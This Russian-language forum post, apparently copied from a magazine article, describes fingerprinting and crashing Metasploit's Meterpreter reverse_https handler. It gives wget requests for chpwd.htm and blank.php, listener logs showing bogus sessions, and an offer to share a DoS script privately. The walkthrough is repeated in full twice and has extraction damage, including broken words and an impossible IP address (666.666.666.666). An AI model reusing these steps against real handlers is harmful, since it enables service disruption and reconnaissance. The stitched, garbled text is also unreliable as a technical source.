Найденные уязвимости позволяют провести DoS-атаку на обработчик HTTPS-запросов этой утилиты. Процесс состоит из двух шагов.
Виной всему порт, который использует утилита. Он доступен по URL (проверя- лось через HTTPS-протокол).
http://joxi.ru/RmzxVz1s0daDnA Смотрите скрин
Там есть множество файлов, которые мы можем запросить через URL, и каждый из них, в свою очередь, вызывает разное поведение обработчика. От содержа- ния и типа получаемых файлов зависит возможность определения наличия ути- литы или проведения DoS-атаки.
Запустим свой handler с полезной нагрузкой в виде шелла meterpreter reverse_https.
http://joxi.ru/KAgoXWeu4V8DqA-Смотрите скрин
Теперь попробуем получить файл chpwd.htm из listener.
$ wget -qO- --no-check-certi cate https://192.168.1.1/chpwd.htm
...core_patch_url...LUDZ6djujGbWvte_gMomnQm7EQVgW7RJfg3xpGoDUgRe_
SdhLJBud68viiiDN1UsrniHZsjxLn9qYOo4YJIIU6K5ZnhNsuoGoPuWqKpQQVtxU6
L4EQg8ka9cZ4aJ-/
Ну и так BTCMaker думаю заметил что этот файл содержит строки core_patch_url и следующую за ней, сгенерированную случайным образом. На стороне listener в логах видим следующее:
73.x.x.x:47054 (UUID: 2d40d9e9d8ee8c66/x86=1/windows=1/2015-
12-19T05:50:27Z) Redirecting stageless connection from /chpwd.htm
with UA 'Wget/1.16 (linux-gnu)'
Есть и альтернативный способ. Мы можем запросить файл blank.php. Это акту- альный файл для listener, который представляет собой DLL-библиотеку.
Список доступных файлов-http://joxi.ru/J2bVa3bIXv9bp2
и вот еще http://joxi.ru/bmoz9vLIxjJeBr
$ wget --no-check-certi cate https://666.666.666.666/blank.php
$ le blank.php: PE32 executable (DLL) (GUI) Intel 80386,
for MS Windows
Теперь в логах мы уже видим следующее:
[*] 73.x.x.x:10458 (UUID: 376988d5161359f3/x86=1/windows=1/2015-
12-19T04:44:20Z) Staging Python payload ...
[*] Meterpreter session 57 opened (192.168.1.1:65535 ->
73.x.x.x:10458) at 2015-12-19 04:44:20 +0000
Запрос файла blank.php триггерит скрипт на Python и открывает сессию Meterpreter (правда, она неправильная и скоро будет закрыта).
[-] Meterpreter session 57 is not valid and will be closed
Лог самого Meterpreter подтверждает наличие ложной сессии. В итоге мы по- лучаем DoS у handler, вызывая задержку между любой «правильной» полезной нагрузкой и handler/listener.
Помимо получения строки core_patch_url из chpwd.htm и бинарного blank.php, мы можем найти много информации среди доступных файлов (см. скриншоты).
Кому нужен скрипт для DoS и обнаружения-пишите в личку
- Используя GET-запросы к известным файлам через handler/listener и прове-
ряя наличие строки core_patch_url, узнаем о запущенной версии утилиты.
- Используя вредоносный или недоделанный GET-запрос к определенным
файлам утилиты, можно попасть в открытую Meterpreter сессию и сделать так, чтобы сессии больше не принимались (DoS).
Виной всему порт, который использует утилита. Он доступен по URL (проверя- лось через HTTPS-протокол).
http://joxi.ru/RmzxVz1s0daDnA Смотрите скрин
Там есть множество файлов, которые мы можем запросить через URL, и каждый из них, в свою очередь, вызывает разное поведение обработчика. От содержа- ния и типа получаемых файлов зависит возможность определения наличия ути- литы или проведения DoS-атаки.
Запустим свой handler с полезной нагрузкой в виде шелла meterpreter reverse_https.
http://joxi.ru/KAgoXWeu4V8DqA-Смотрите скрин
Теперь попробуем получить файл chpwd.htm из listener.
$ wget -qO- --no-check-certi cate https://192.168.1.1/chpwd.htm
...core_patch_url...LUDZ6djujGbWvte_gMomnQm7EQVgW7RJfg3xpGoDUgRe_
SdhLJBud68viiiDN1UsrniHZsjxLn9qYOo4YJIIU6K5ZnhNsuoGoPuWqKpQQVtxU6
L4EQg8ka9cZ4aJ-/
Ну и так BTCMaker думаю заметил что этот файл содержит строки core_patch_url и следующую за ней, сгенерированную случайным образом. На стороне listener в логах видим следующее:
73.x.x.x:47054 (UUID: 2d40d9e9d8ee8c66/x86=1/windows=1/2015-
12-19T05:50:27Z) Redirecting stageless connection from /chpwd.htm
with UA 'Wget/1.16 (linux-gnu)'
Есть и альтернативный способ. Мы можем запросить файл blank.php. Это акту- альный файл для listener, который представляет собой DLL-библиотеку.
Список доступных файлов-http://joxi.ru/J2bVa3bIXv9bp2
и вот еще http://joxi.ru/bmoz9vLIxjJeBr
$ wget --no-check-certi cate https://666.666.666.666/blank.php
$ le blank.php: PE32 executable (DLL) (GUI) Intel 80386,
for MS Windows
Теперь в логах мы уже видим следующее:
[*] 73.x.x.x:10458 (UUID: 376988d5161359f3/x86=1/windows=1/2015-
12-19T04:44:20Z) Staging Python payload ...
[*] Meterpreter session 57 opened (192.168.1.1:65535 ->
73.x.x.x:10458) at 2015-12-19 04:44:20 +0000
Запрос файла blank.php триггерит скрипт на Python и открывает сессию Meterpreter (правда, она неправильная и скоро будет закрыта).
[-] Meterpreter session 57 is not valid and will be closed
Лог самого Meterpreter подтверждает наличие ложной сессии. В итоге мы по- лучаем DoS у handler, вызывая задержку между любой «правильной» полезной нагрузкой и handler/listener.
Помимо получения строки core_patch_url из chpwd.htm и бинарного blank.php, мы можем найти много информации среди доступных файлов (см. скриншоты).
Кому нужен скрипт для DoS и обнаружения-пишите в личку